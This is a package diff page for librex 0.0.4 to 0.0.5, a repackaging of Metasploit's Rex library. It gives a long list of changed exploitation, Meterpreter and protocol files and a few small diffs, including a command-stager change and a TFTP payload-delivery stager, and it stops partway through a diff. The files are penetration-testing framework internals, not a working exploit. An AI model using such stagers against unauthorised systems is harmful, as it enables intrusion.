librex 0.0.4 → 0.0.5
Sign up to get free protection for your applications and to get access to all the features.
- data/README.md +12 -0
- data/lib/rex.rb +0 -0
- data/lib/rex.rb.ts.rb +0 -0
- data/lib/rex/LICENSE +0 -0
- data/lib/rex/arch.rb +0 -0
- data/lib/rex/arch/sparc.rb +0 -0
- data/lib/rex/arch/sparc.rb.ut.rb +0 -0
- data/lib/rex/arch/x86.rb +0 -0
- data/lib/rex/arch/x86.rb.ut.rb +0 -0
- data/lib/rex/assembly/nasm.rb +0 -0
- data/lib/rex/assembly/nasm.rb.ut.rb +0 -0
- data/lib/rex/codepage.map +0 -0
- data/lib/rex/compat.rb +0 -0
- data/lib/rex/constants.rb +0 -0
- data/lib/rex/elfparsey.rb +0 -0
- data/lib/rex/elfparsey/elf.rb +0 -0
- data/lib/rex/elfparsey/elfbase.rb +2 -4
- data/lib/rex/elfparsey/exceptions.rb +0 -0
- data/lib/rex/elfscan.rb +0 -0
- data/lib/rex/elfscan/scanner.rb +0 -0
- data/lib/rex/elfscan/search.rb +10 -10
- data/lib/rex/encoder/alpha2.rb +0 -0
- data/lib/rex/encoder/alpha2/alpha_mixed.rb +0 -0
- data/lib/rex/encoder/alpha2/alpha_upper.rb +0 -0
- data/lib/rex/encoder/alpha2/generic.rb +0 -0
- data/lib/rex/encoder/alpha2/unicode_mixed.rb +0 -0
- data/lib/rex/encoder/alpha2/unicode_upper.rb +0 -0
- data/lib/rex/encoder/ndr.rb +0 -0
- data/lib/rex/encoder/ndr.rb.ut.rb +0 -0
- data/lib/rex/encoder/nonalpha.rb +0 -0
- data/lib/rex/encoder/nonupper.rb +0 -0
- data/lib/rex/encoder/xdr.rb +0 -0
- data/lib/rex/encoder/xdr.rb.ut.rb +0 -0
- data/lib/rex/encoder/xor.rb +0 -0
- data/lib/rex/encoder/xor/dword.rb +0 -0
- data/lib/rex/encoder/xor/dword_additive.rb +0 -0
- data/lib/rex/encoders/xor_dword.rb +0 -0
- data/lib/rex/encoders/xor_dword_additive.rb +0 -0
- data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +0 -0
- data/lib/rex/encoding/xor.rb +0 -0
- data/lib/rex/encoding/xor.rb.ts.rb +0 -0
- data/lib/rex/encoding/xor/byte.rb +0 -0
- data/lib/rex/encoding/xor/byte.rb.ut.rb +0 -0
- data/lib/rex/encoding/xor/dword.rb +0 -0
- data/lib/rex/encoding/xor/dword.rb.ut.rb +0 -0
- data/lib/rex/encoding/xor/dword_additive.rb +0 -0
- data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +0 -0
- data/lib/rex/encoding/xor/exceptions.rb +0 -0
- data/lib/rex/encoding/xor/generic.rb +0 -0
- data/lib/rex/encoding/xor/generic.rb.ut.rb +0 -0
- data/lib/rex/encoding/xor/qword.rb +0 -0
- data/lib/rex/encoding/xor/word.rb +0 -0
- data/lib/rex/encoding/xor/word.rb.ut.rb +0 -0
- data/lib/rex/exceptions.rb +0 -0
- data/lib/rex/exceptions.rb.ut.rb +0 -0
- data/lib/rex/exploitation/cmdstager.rb +0 -0
- data/lib/rex/exploitation/cmdstager/base.rb +6 -1
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +0 -0
- data/lib/rex/exploitation/cmdstager/debug_write.rb +0 -0
- data/lib/rex/exploitation/cmdstager/tftp.rb +8 -8
- data/lib/rex/exploitation/cmdstager/vbs.rb +0 -0
- data/lib/rex/exploitation/egghunter.rb +143 -36
- data/lib/rex/exploitation/egghunter.rb.ut.rb +0 -0
- data/lib/rex/exploitation/encryptjs.rb +0 -0
- data/lib/rex/exploitation/heaplib.js.b64 +0 -0
- data/lib/rex/exploitation/heaplib.rb +0 -0
- data/lib/rex/exploitation/javascriptosdetect.rb +114 -15
- data/lib/rex/exploitation/obfuscatejs.rb +0 -0
- data/lib/rex/exploitation/omelet.rb +320 -0
- data/lib/rex/exploitation/omelet.rb.ut.rb +13 -0
- data/lib/rex/exploitation/opcodedb.rb +0 -0
- data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -0
- data/lib/rex/exploitation/seh.rb +0 -0
- data/lib/rex/exploitation/seh.rb.ut.rb +0 -0
- data/lib/rex/file.rb +1 -1
- data/lib/rex/file.rb.ut.rb +0 -0
- data/lib/rex/image_source.rb +0 -0
- data/lib/rex/image_source/disk.rb +0 -0
- data/lib/rex/image_source/image_source.rb +0 -0
- data/lib/rex/image_source/memory.rb +0 -0
- data/lib/rex/io/bidirectional_pipe.rb +0 -0
- data/lib/rex/io/datagram_abstraction.rb +0 -0
- data/lib/rex/io/stream.rb +1 -1
- data/lib/rex/io/stream_abstraction.rb +0 -0
- data/lib/rex/io/stream_server.rb +0 -0
- data/lib/rex/job_container.rb +0 -1
- data/lib/rex/logging.rb +0 -0
- data/lib/rex/logging/log_dispatcher.rb +0 -0
- data/lib/rex/logging/log_sink.rb +0 -0
- data/lib/rex/logging/sinks/flatfile.rb +0 -0
- data/lib/rex/logging/sinks/stderr.rb +0 -0
- data/lib/rex/machparsey.rb +0 -0
- data/lib/rex/machparsey/exceptions.rb +0 -0
- data/lib/rex/machparsey/machbase.rb +0 -0
- data/lib/rex/machscan.rb +0 -0
- data/lib/rex/machscan/scanner.rb +0 -0
- data/lib/rex/mime.rb +0 -0
- data/lib/rex/mime/header.rb +0 -0
- data/lib/rex/mime/message.rb +0 -0
- data/lib/rex/mime/part.rb +0 -0
- data/lib/rex/nop/opty2.rb +0 -0
- data/lib/rex/nop/opty2.rb.ut.rb +0 -0
- data/lib/rex/nop/opty2_tables.rb +0 -0
- data/lib/rex/ole.rb +0 -0
- data/lib/rex/ole/clsid.rb +0 -0
- data/lib/rex/ole/difat.rb +0 -0
- data/lib/rex/ole/directory.rb +0 -0
- data/lib/rex/ole/direntry.rb +0 -0
- data/lib/rex/ole/docs/dependencies.txt +8 -0
- data/lib/rex/ole/docs/references.txt +1 -0
- data/lib/rex/ole/fat.rb +0 -0
- data/lib/rex/ole/header.rb +3 -3
- data/lib/rex/ole/minifat.rb +0 -0
- data/lib/rex/ole/storage.rb +4 -4
- data/lib/rex/ole/stream.rb +0 -0
- data/lib/rex/ole/substorage.rb +0 -0
- data/lib/rex/ole/util.rb +0 -0
- data/lib/rex/parser/arguments.rb +0 -0
- data/lib/rex/parser/arguments.rb.ut.rb +0 -0
- data/lib/rex/parser/ini.rb +0 -0
- data/lib/rex/parser/ini.rb.ut.rb +0 -0
- data/lib/rex/parser/nexpose_xml.rb +0 -0
- data/lib/rex/parser/nmap_xml.rb +0 -0
- data/lib/rex/payloads.rb +0 -0
- data/lib/rex/payloads/win32.rb +0 -0
- data/lib/rex/payloads/win32/common.rb +0 -0
- data/lib/rex/payloads/win32/kernel.rb +0 -0
- data/lib/rex/payloads/win32/kernel/common.rb +0 -0
- data/lib/rex/payloads/win32/kernel/migration.rb +0 -0
- data/lib/rex/payloads/win32/kernel/recovery.rb +0 -0
- data/lib/rex/peparsey.rb +0 -0
- data/lib/rex/peparsey/exceptions.rb +0 -0
- data/lib/rex/peparsey/pe.rb +7 -1
- data/lib/rex/peparsey/pe_memdump.rb +0 -0
- data/lib/rex/peparsey/pebase.rb +27 -2
- data/lib/rex/peparsey/section.rb +0 -0
- data/lib/rex/pescan.rb +0 -0
- data/lib/rex/pescan/analyze.rb +0 -0
- data/lib/rex/pescan/scanner.rb +0 -0
- data/lib/rex/pescan/search.rb +0 -0
- data/lib/rex/platforms.rb +0 -0
- data/lib/rex/platforms/windows.rb +0 -0
- data/lib/rex/poly.rb +0 -0
- data/lib/rex/poly/block.rb +0 -0
- data/lib/rex/poly/register.rb +0 -0
- data/lib/rex/poly/register/x86.rb +0 -0
- data/lib/rex/post.rb +0 -0
- data/lib/rex/post/dir.rb +0 -0
- data/lib/rex/post/file.rb +0 -0
- data/lib/rex/post/file_stat.rb +0 -0
- data/lib/rex/post/gen.pl +0 -0
- data/lib/rex/post/io.rb +0 -0
- data/lib/rex/post/meterpreter.rb +0 -0
- data/lib/rex/post/meterpreter/channel.rb +0 -0
- data/lib/rex/post/meterpreter/channel_container.rb +0 -0
- data/lib/rex/post/meterpreter/channels/pool.rb +0 -0
- data/lib/rex/post/meterpreter/channels/pools/file.rb +0 -0
- data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +0 -0
- data/lib/rex/post/meterpreter/channels/stream.rb +0 -0
- data/lib/rex/post/meterpreter/client.rb +3 -0
- data/lib/rex/post/meterpreter/client_core.rb +0 -0
- data/lib/rex/post/meterpreter/dependencies.rb +0 -0
- data/lib/rex/post/meterpreter/extension.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/espia/espia.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +57 -0
- data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +15 -0
- data/lib/rex/post/meterpreter/extensions/priv/fs.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/priv/priv.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +2 -1
- data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +12 -10
- data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +31 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/{railgun → stdapi/railgun}/api_constants.rb +38106 -38105
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +1804 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +96 -0
- data/lib/rex/post/meterpreter/extensions/{railgun → stdapi/railgun/def}/def_kernel32.rb +3848 -3678
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +153 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +21 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +3169 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +599 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/model.rb +540 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +308 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +196 -0
- data/lib/rex/post/meterpreter/extensions/{railgun → stdapi/railgun}/tlv.rb +6 -9
- data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +5 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +0 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +6 -0
- data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +0 -0
- data/lib/rex/post/meterpreter/inbound_packet_handler.rb +0 -0
- data/lib/rex/post/meterpreter/object_aliases.rb +0 -0
- data/lib/rex/post/meterpreter/packet.rb +23 -1
- data/lib/rex/post/meterpreter/packet_dispatcher.rb +13 -2
- data/lib/rex/post/meterpreter/packet_parser.rb +0 -0
- data/lib/rex/post/meterpreter/packet_response_waiter.rb +17 -10
- data/lib/rex/post/meterpreter/ui/console.rb +0 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +0 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +12 -7
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +0 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +0 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +221 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +0 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +0 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +0 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +0 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +4 -3
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +0 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +56 -1
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +22 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +0 -0
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +0 -0
- data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +0 -0
- data/lib/rex/post/permission.rb +0 -0
- data/lib/rex/post/process.rb +0 -0
- data/lib/rex/post/thread.rb +0 -0
- data/lib/rex/post/ui.rb +0 -0
- data/lib/rex/proto.rb +0 -0
- data/lib/rex/proto.rb.ts.rb +0 -0
- data/lib/rex/proto/dcerpc.rb +0 -0
- data/lib/rex/proto/dcerpc.rb.ts.rb +0 -0
- data/lib/rex/proto/dcerpc/client.rb +3 -1
- data/lib/rex/proto/dcerpc/exceptions.rb +0 -0
- data/lib/rex/proto/dcerpc/handle.rb +0 -0
- data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -0
- data/lib/rex/proto/dcerpc/ndr.rb +0 -0
- data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -0
- data/lib/rex/proto/dcerpc/packet.rb +0 -0
- data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -0
- data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -0
- data/lib/rex/proto/dcerpc/uuid.rb +0 -0
- data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -0
- data/lib/rex/proto/dhcp.rb +7 -0
- data/lib/rex/proto/dhcp/constants.rb +33 -0
- data/lib/rex/proto/dhcp/server.rb +285 -0
- data/lib/rex/proto/drda.rb +0 -0
- data/lib/rex/proto/drda.rb.ts.rb +0 -0
- data/lib/rex/proto/drda/constants.rb +0 -0
- data/lib/rex/proto/drda/constants.rb.ut.rb +0 -0
- data/lib/rex/proto/drda/packet.rb +0 -0
- data/lib/rex/proto/drda/packet.rb.ut.rb +0 -0
- data/lib/rex/proto/drda/utils.rb +0 -0
- data/lib/rex/proto/drda/utils.rb.ut.rb +0 -0
- data/lib/rex/proto/http.rb +0 -0
- data/lib/rex/proto/http.rb.ts.rb +0 -0
- data/lib/rex/proto/http/client.rb +27 -2
- data/lib/rex/proto/http/client.rb.ut.rb +4 -2
- data/lib/rex/proto/http/handler.rb +0 -0
- data/lib/rex/proto/http/handler/erb.rb +0 -0
- data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -0
- data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -0
- data/lib/rex/proto/http/handler/proc.rb +6 -0
- data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -0
- data/lib/rex/proto/http/header.rb +0 -0
- data/lib/rex/proto/http/header.rb.ut.rb +0 -0
- data/lib/rex/proto/http/packet.rb +20 -19
- data/lib/rex/proto/http/packet.rb.ut.rb +0 -0
- data/lib/rex/proto/http/request.rb +0 -0
- data/lib/rex/proto/http/request.rb.ut.rb +0 -0
- data/lib/rex/proto/http/response.rb +0 -0
- data/lib/rex/proto/http/response.rb.ut.rb +0 -0
- data/lib/rex/proto/http/server.rb +5 -3
- data/lib/rex/proto/http/server.rb.ut.rb +0 -0
- data/lib/rex/proto/proxy/socks4a.rb +440 -0
- data/lib/rex/proto/smb.rb +0 -0
- data/lib/rex/proto/smb.rb.ts.rb +0 -0
- data/lib/rex/proto/smb/client.rb +110 -61
- data/lib/rex/proto/smb/client.rb.ut.rb +0 -0
- data/lib/rex/proto/smb/constants.rb +5 -3
- data/lib/rex/proto/smb/constants.rb.ut.rb +0 -0
- data/lib/rex/proto/smb/crypt.rb +0 -0
- data/lib/rex/proto/smb/crypt.rb.ut.rb +0 -0
- data/lib/rex/proto/smb/exceptions.rb +0 -0
- data/lib/rex/proto/smb/simpleclient.rb +0 -0
- data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -0
- data/lib/rex/proto/smb/utils.rb +2 -0
- data/lib/rex/proto/smb/utils.rb.ut.rb +0 -0
- data/lib/rex/proto/sunrpc.rb +0 -0
- data/lib/rex/proto/sunrpc/client.rb +0 -0
- data/lib/rex/proto/tftp.rb +10 -1
- data/lib/rex/proto/tftp/constants.rb +5 -3
- data/lib/rex/proto/tftp/server.rb +79 -9
- data/lib/rex/script.rb +0 -0
- data/lib/rex/script/base.rb +0 -0
- data/lib/rex/script/meterpreter.rb +0 -0
- data/lib/rex/script/shell.rb +0 -0
- data/lib/rex/service.rb +0 -0
- data/lib/rex/service_manager.rb +0 -0
- data/lib/rex/service_manager.rb.ut.rb +0 -0
- data/lib/rex/services/local_relay.rb +0 -0
- data/lib/rex/socket.rb +6 -4
- data/lib/rex/socket.rb.ut.rb +0 -0
- data/lib/rex/socket/comm.rb +0 -0
- data/lib/rex/socket/comm/local.rb +0 -0
- data/lib/rex/socket/comm/local.rb.ut.rb +0 -0
- data/lib/rex/socket/ip.rb +0 -0
- data/lib/rex/socket/parameters.rb +0 -0
- data/lib/rex/socket/parameters.rb.ut.rb +0 -0
- data/lib/rex/socket/range_walker.rb +0 -0
- data/lib/rex/socket/range_walker.rb.ut.rb +0 -0
- data/lib/rex/socket/ssl_tcp.rb +1 -1
- data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -0
- data/lib/rex/socket/ssl_tcp_server.rb +0 -0
- data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -0
- data/lib/rex/socket/subnet_walker.rb +0 -0
- data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -0
- data/lib/rex/socket/switch_board.rb.ut.rb +0 -0
- data/lib/rex/socket/tcp.rb +0 -0
- data/lib/rex/socket/tcp.rb.ut.rb +0 -0
- data/lib/rex/socket/tcp_server.rb +0 -0
- data/lib/rex/socket/tcp_server.rb.ut.rb +0 -0
- data/lib/rex/socket/udp.rb +0 -0
- data/lib/rex/socket/udp.rb.ut.rb +0 -0
- data/lib/rex/struct2.rb +0 -0
- data/lib/rex/struct2/c_struct.rb +0 -0
- data/lib/rex/struct2/c_struct_template.rb +0 -0
- data/lib/rex/struct2/constant.rb +0 -0
- data/lib/rex/struct2/element.rb +0 -0
- data/lib/rex/struct2/generic.rb +0 -0
- data/lib/rex/struct2/restraint.rb +0 -0
- data/lib/rex/struct2/s_string.rb +0 -0
- data/lib/rex/struct2/s_struct.rb +0 -0
- data/lib/rex/sync.rb +0 -0
- data/lib/rex/sync/event.rb +0 -0
- data/lib/rex/sync/read_write_lock.rb +0 -0
- data/lib/rex/sync/ref.rb +0 -0
- data/lib/rex/sync/thread_safe.rb +0 -0
- data/lib/rex/test.rb +0 -0
- data/lib/rex/text.rb +13 -3
- data/lib/rex/text.rb.ut.rb +9 -4
- data/lib/rex/time.rb +0 -0
- data/lib/rex/transformer.rb +0 -0
- data/lib/rex/transformer.rb.ut.rb +0 -0
- data/lib/rex/ui.rb +0 -0
- data/lib/rex/ui/interactive.rb +0 -0
- data/lib/rex/ui/output.rb +0 -0
- data/lib/rex/ui/output/none.rb +0 -0
- data/lib/rex/ui/progress_tracker.rb +0 -0
- data/lib/rex/ui/subscriber.rb +0 -0
- data/lib/rex/ui/text/color.rb +0 -0
- data/lib/rex/ui/text/color.rb.ut.rb +0 -0
- data/lib/rex/ui/text/dispatcher_shell.rb +0 -0
- data/lib/rex/ui/text/input.rb +0 -0
- data/lib/rex/ui/text/input/buffer.rb +0 -0
- data/lib/rex/ui/text/input/readline.rb +0 -0
- data/lib/rex/ui/text/input/socket.rb +0 -0
- data/lib/rex/ui/text/input/stdio.rb +0 -0
- data/lib/rex/ui/text/irb_shell.rb +0 -0
- data/lib/rex/ui/text/output.rb +0 -0
- data/lib/rex/ui/text/output/buffer.rb +0 -0
- data/lib/rex/ui/text/output/file.rb +0 -0
- data/lib/rex/ui/text/output/socket.rb +0 -0
- data/lib/rex/ui/text/output/stdio.rb +0 -0
- data/lib/rex/ui/text/progress_tracker.rb +0 -0
- data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -0
- data/lib/rex/ui/text/shell.rb +9 -6
- data/lib/rex/ui/text/table.rb +5 -0
- data/lib/rex/ui/text/table.rb.ut.rb +0 -0
- data/lib/rex/zip.rb +0 -0
- data/lib/rex/zip/archive.rb +29 -1
- data/lib/rex/zip/blocks.rb +0 -0
- data/lib/rex/zip/entry.rb +5 -1
- metadata +369 -413
- data/README +0 -8
- data/lib/rex/post/meterpreter/extensions/railgun/api.rb +0 -9303
- data/lib/rex/post/meterpreter/extensions/railgun/railgun.rb +0 -815
- data/lib/rex/post/meterpreter/ui/console/command_dispatcher/railgun.rb +0 -57
data/README.md
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
REX
|
2
|
+
===
|
3
|
+
|
4
|
+
A non-official re-packaging of the Rex library as a gem for easy of usage of the Metasploit REX framework in a non Metasploit application. I received permission from HDM to create this package.
|
5
|
+
|
6
|
+
Currently based on:
|
7
|
+
SVN Revision: 10547
|
8
|
+
|
9
|
+
Credits
|
10
|
+
===
|
11
|
+
The Metasploit development team <http://www.metasploit.com>
|
12
|
+
|
data/lib/rex.rb
CHANGED
File without changes
|
data/lib/rex.rb.ts.rb
CHANGED
File without changes
|
data/lib/rex/LICENSE
CHANGED
File without changes
|
data/lib/rex/arch.rb
CHANGED
File without changes
|
data/lib/rex/arch/sparc.rb
CHANGED
File without changes
|
data/lib/rex/arch/sparc.rb.ut.rb
CHANGED
File without changes
|
data/lib/rex/arch/x86.rb
CHANGED
File without changes
|
data/lib/rex/arch/x86.rb.ut.rb
CHANGED
File without changes
|
data/lib/rex/assembly/nasm.rb
CHANGED
File without changes
|
File without changes
|
data/lib/rex/codepage.map
CHANGED
File without changes
|
data/lib/rex/compat.rb
CHANGED
File without changes
|
data/lib/rex/constants.rb
CHANGED
File without changes
|
data/lib/rex/elfparsey.rb
CHANGED
File without changes
|
data/lib/rex/elfparsey/elf.rb
CHANGED
File without changes
|
@@ -1,6 +1,6 @@
|
|
1
1
|
#!/usr/bin/env ruby
|
2
2
|
|
3
|
-
# $Id: elfbase.rb
|
3
|
+
# $Id: elfbase.rb 9937 2010-07-27 18:03:18Z jduck $
|
4
4
|
|
5
5
|
require 'rex/struct2'
|
6
6
|
|
@@ -192,7 +192,7 @@ class ElfBase
|
|
192
192
|
|
193
193
|
# Program Header
|
194
194
|
|
195
|
-
PROGRAM_HEADER_SIZE =
|
195
|
+
PROGRAM_HEADER_SIZE = 32
|
196
196
|
|
197
197
|
ELF32_PHDR_LSB = Rex::Struct2::CStructTemplate.new(
|
198
198
|
[ 'uint32v', 'p_type', 0 ],
|
@@ -200,7 +200,6 @@ class ElfBase
|
|
200
200
|
[ 'uint32v', 'p_vaddr', 0 ],
|
201
201
|
[ 'uint32v', 'p_paddr', 0 ],
|
202
202
|
[ 'uint32v', 'p_filesz', 0 ],
|
203
|
-
[ 'uint32v', 'p_filesz', 0 ],
|
204
203
|
[ 'uint32v', 'p_memsz', 0 ],
|
205
204
|
[ 'uint32v', 'p_flags', 0 ],
|
206
205
|
[ 'uint32v', 'p_align', 0 ]
|
@@ -212,7 +211,6 @@ class ElfBase
|
|
212
211
|
[ 'uint32n', 'p_vaddr', 0 ],
|
213
212
|
[ 'uint32n', 'p_paddr', 0 ],
|
214
213
|
[ 'uint32n', 'p_filesz', 0 ],
|
215
|
-
[ 'uint32n', 'p_filesz', 0 ],
|
216
214
|
[ 'uint32n', 'p_memsz', 0 ],
|
217
215
|
[ 'uint32n', 'p_flags', 0 ],
|
218
216
|
[ 'uint32n', 'p_align', 0 ]
|
File without changes
|
data/lib/rex/elfscan.rb
CHANGED
File without changes
|
data/lib/rex/elfscan/scanner.rb
CHANGED
File without changes
|
data/lib/rex/elfscan/search.rb
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
#!/usr/bin/env ruby
|
2
2
|
|
3
|
-
# $Id: search.rb
|
3
|
+
# $Id: search.rb 10173 2010-08-27 21:26:59Z jduck $
|
4
4
|
|
5
5
|
module Rex
|
6
6
|
module ElfScan
|
@@ -8,29 +8,29 @@ module Search
|
|
8
8
|
|
9
9
|
class DumpRVA
|
10
10
|
attr_accessor :elf
|
11
|
-
|
11
|
+
|
12
12
|
def initialize(elf)
|
13
13
|
self.elf = elf
|
14
14
|
end
|
15
|
-
|
15
|
+
|
16
16
|
def config(param)
|
17
17
|
@address = param['args']
|
18
18
|
end
|
19
|
-
|
19
|
+
|
20
20
|
def scan(param)
|
21
21
|
config(param)
|
22
|
-
|
22
|
+
|
23
23
|
$stdout.puts "[#{param['file']}]"
|
24
|
-
|
24
|
+
|
25
25
|
# Adjust based on -A and -B flags
|
26
26
|
pre = param['before'] || 0
|
27
27
|
suf = param['after'] || 16
|
28
|
-
|
28
|
+
|
29
29
|
@address -= pre
|
30
30
|
@address = 0 if (@address < 0 || ! @address)
|
31
31
|
buf = elf.read_rva(@address, suf)
|
32
32
|
$stdout.puts elf.ptr_s(@address) + " " + buf.unpack("H*")[0]
|
33
|
-
end
|
33
|
+
end
|
34
34
|
end
|
35
35
|
|
36
36
|
class DumpOffset < DumpRVA
|
@@ -40,7 +40,7 @@ module Search
|
|
40
40
|
rescue Rex::ElfParsey::BoundsError
|
41
41
|
end
|
42
42
|
end
|
43
|
-
end
|
43
|
+
end
|
44
|
+
end
|
44
45
|
end
|
45
46
|
end
|
46
|
-
end
|
data/lib/rex/encoder/alpha2.rb
CHANGED
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
data/lib/rex/encoder/ndr.rb
CHANGED
File without changes
|
File without changes
|
data/lib/rex/encoder/nonalpha.rb
CHANGED
File without changes
|
data/lib/rex/encoder/nonupper.rb
CHANGED
File without changes
|
data/lib/rex/encoder/xdr.rb
CHANGED
File without changes
|
File without changes
|
data/lib/rex/encoder/xor.rb
CHANGED
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
data/lib/rex/encoding/xor.rb
CHANGED
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
File without changes
|
data/lib/rex/exceptions.rb
CHANGED
File without changes
|
data/lib/rex/exceptions.rb.ut.rb
CHANGED
File without changes
|
File without changes
|
@@ -127,6 +127,11 @@ class CmdStagerBase
|
|
127
127
|
new_cmds = []
|
128
128
|
line = ''
|
129
129
|
concat = cmd_concat_operator
|
130
|
+
|
131
|
+
# We cannot compress commands if there is no way to combine commands on
|
132
|
+
# a single line.
|
133
|
+
return cmds if not concat
|
134
|
+
|
130
135
|
cmds.each { |cmd|
|
131
136
|
|
132
137
|
# If this command will fit, concat it and move on.
|
@@ -162,7 +167,7 @@ class CmdStagerBase
|
|
162
167
|
# Can be overriden. For exmaple, use for unix use ";" instead
|
163
168
|
#
|
164
169
|
def cmd_concat_operator
|
165
|
-
|
170
|
+
nil
|
166
171
|
end
|
167
172
|
|
168
173
|
end
|
File without changes
|
File without changes
|
@@ -1,5 +1,5 @@
|
|
1
1
|
##
|
2
|
-
# $Id: tftp.rb
|
2
|
+
# $Id: tftp.rb 10169 2010-08-27 17:23:47Z jduck $
|
3
3
|
##
|
4
4
|
|
5
5
|
require 'rex/text'
|
@@ -30,7 +30,7 @@ class CmdStagerTFTP < CmdStagerBase
|
|
30
30
|
def initialize(exe)
|
31
31
|
super
|
32
32
|
|
33
|
-
@
|
33
|
+
@payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
|
34
34
|
end
|
35
35
|
|
36
36
|
|
@@ -40,10 +40,10 @@ class CmdStagerTFTP < CmdStagerBase
|
|
40
40
|
#
|
41
41
|
def compress_commands(cmds, opts)
|
42
